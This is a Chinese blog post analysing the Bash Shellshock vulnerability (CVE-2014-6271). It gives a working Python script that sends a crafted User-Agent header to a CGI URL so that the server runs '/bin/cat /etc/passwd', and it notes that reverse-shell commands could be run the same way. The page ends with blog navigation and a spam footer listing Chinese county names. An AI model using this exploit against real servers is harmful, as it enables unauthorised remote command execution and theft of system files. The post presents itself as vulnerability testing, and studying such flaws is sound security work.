qileilove

          blog已經轉移至github,大家請訪問 http://qaseven.github.io/

          Bash遠程命令執行漏洞(CVE-2014-6271)分析利用

           這幾天Bash被爆存在遠程命令執行漏洞(CVE-2014-6271),昨天參加完isc,晚上回家測試了一下,寫了個python版本的測試小基本,貼上代碼:
          #coding:utf-8
          import urllib,httplib
          import sys,re,urlparse
          #author:nx4dm1n
          #website:www.nxadmin.com
          def bash_exp(url):
          urlsp=urlparse.urlparse(url)
          hostname=urlsp.netloc
          urlpath=urlsp.path
          conn=httplib.HTTPConnection(hostname)
          headers={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"}
          conn.request("GET",urlpath,headers=headers)
          res=conn.getresponse()
          res=res.getheaders()
          for passwdstr in res:
          print passwdstr[0]+':'+passwdstr[1]
          if __name__=='__main__':
          #帶http
          if len(sys.argv)<2:
          print "Usage: "+sys.argv[0]+"www.nxadmin.com/cgi-bin/index.cgi"
          sys.exit()
          else:
          bash_exp(sys.argv[1])
            腳本執行效果如圖所示:
            bash命令執行
            也可以用burp進行測試。
            利用該漏洞其實可以做很多事情,寫的python小腳本只是執行了cat /etc/passwd。可以執行反向鏈接的命令等,直接獲取一個shell還是有可能的。不過漏洞存在的條件也比較苛刻,測試找了一些,發現了很少幾個存在漏洞。

          posted on 2014-11-26 14:20 順其自然EVO 閱讀(539) 評論(0)  編輯  收藏 所屬分類: 測試學習專欄安全性測試

          <2014年11月>
          2627282930311
          2345678
          9101112131415
          16171819202122
          23242526272829
          30123456

          導航

          統計

          常用鏈接

          留言簿(55)

          隨筆分類

          隨筆檔案

          文章分類

          文章檔案

          搜索

          最新評論

          閱讀排行榜

          評論排行榜

          主站蜘蛛池模板: 三原县| 韶关市| 武义县| 麻阳| 略阳县| 永寿县| 长垣县| 邵阳县| 板桥市| 凤翔县| 土默特左旗| 宾川县| 扎兰屯市| 龙门县| 曲靖市| 嫩江县| 石台县| 德州市| 合肥市| 阳高县| 如东县| 辉南县| 临夏县| 香格里拉县| 东安县| 奉化市| 丹凤县| 江门市| 土默特右旗| 珲春市| 祥云县| 天门市| 古田县| 喜德县| 滕州市| 璧山县| 镇原县| 宁海县| 莲花县| 博白县| 固原市|